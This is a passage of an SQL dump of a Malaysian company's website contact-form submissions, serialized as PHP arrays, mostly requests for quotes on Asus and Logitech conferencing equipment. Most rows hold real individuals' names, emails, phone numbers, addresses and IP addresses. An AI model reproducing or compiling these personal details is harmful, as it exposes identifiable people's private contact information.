T101HA\";i:3;s:6:\"VP278H\";i:4;s:6:\"VZ249H\";i:5;s:6:\"VA326H\";i:6;s:6:\"VC239H\";i:7;s:6:\"PA329Q\";i:8;s:7:\"VP228HE\";i:9;s:7:\"MB169B+\";i:10;s:12:\"ASUSPRO E520\";i:11;s:16:\"ASUS Chromebox 3\";i:12;s:12:\"Mini PC PB60\";i:13;s:12:\"MINI PC PN60\";i:14;s:14:\"VivoMini UN65U\";i:15;s:16:\"VivoMini VC65-C1\";i:16;s:15:\"VivoMini VC65-C\";i:17;s:14:\"VivoMini UN68U\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"63\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"ASUS VivoBook S\";}i:8;a:7:{s:2:\"id\";s:2:\"56\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"58\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"56\";s:5:\"value\";s:2:\"21\";}i:10;a:7:{s:2:\"id\";s:2:\"59\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"56\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Asus)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-13 04:18:31','192.228.221.73','1'),(207,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"MAISARAH ABD MUTALIB\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"SARAH2705@GMAIL.COM\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162513005\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"NEZIA EDERMA\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"SUNWAY MONTANA\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Logitech Group, Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"PLEASE SEND ME YOUR QUOTATION\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"72\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-20 13:28:21','118.100.197.42','1'),(208,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Sarah Tan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"sarahtan1510@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162439635\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"sarahtan\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"hi\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-23 09:20:10','60.49.33.117','1'),(209,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Lasantha Perera\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"genius@sltnet.lk\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"94777369992\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Genius Associates (ppvt) ltd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:43:\"47, Jambugasmulla Road, Nugegoda, Sri Lanka\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:85:\"Pl send me price of Logitech Group video conferencing kit. Cash and carry price in KL\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-24 19:11:08','123.231.106.214','1'),(210,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Aaratthi\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"aaratthi_mahanan@imu.edu.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60327317229\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"IMU Education Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:47:\"No.126, Jalan Perkasa 19, 57000 Bukit Jalil, KL\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Please quote me the price.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"13\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-06-27 18:44:30','60.54.123.16','1'),(211,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"AIDY IDZMAR BIN ISMAIL\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"idzmar@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193854973\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Cement Industries of Malaysia Berhad\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:119:\"Annexe 2, Persada PLUS, Persimpangan Bertingkat Subang, KM15 Lebuhraya Baru Lembah Klang, 47301 Petaling Jaya, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Please provide us the quotation for the said item.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-01 09:16:09','60.54.118.122','1'),(212,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"AIDY IDZMAR BIN ISMAIL\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"idzmar@cima.uemnet.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193854973\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Cement Industries of Malaysia Berhad\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:119:\"Annexe 2, Persada PLUS, Persimpangan Bertingkat Subang, KM15 Lebuhraya Baru Lembah Klang, 47301 Petaling Jaya, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Please provide us the quotation for the said item.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"71\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-01 09:16:49','124.13.191.2','1'),(213,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Faizah binti Ismail\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"faizah@bqsm.gov.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"03-26107809\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Board of Quantity Surveyors Malaysia\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:118:\"Dear Sir/Madam, We would like to request for price quotation on conference mic system. Thank you. Best Regards, Faizah\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 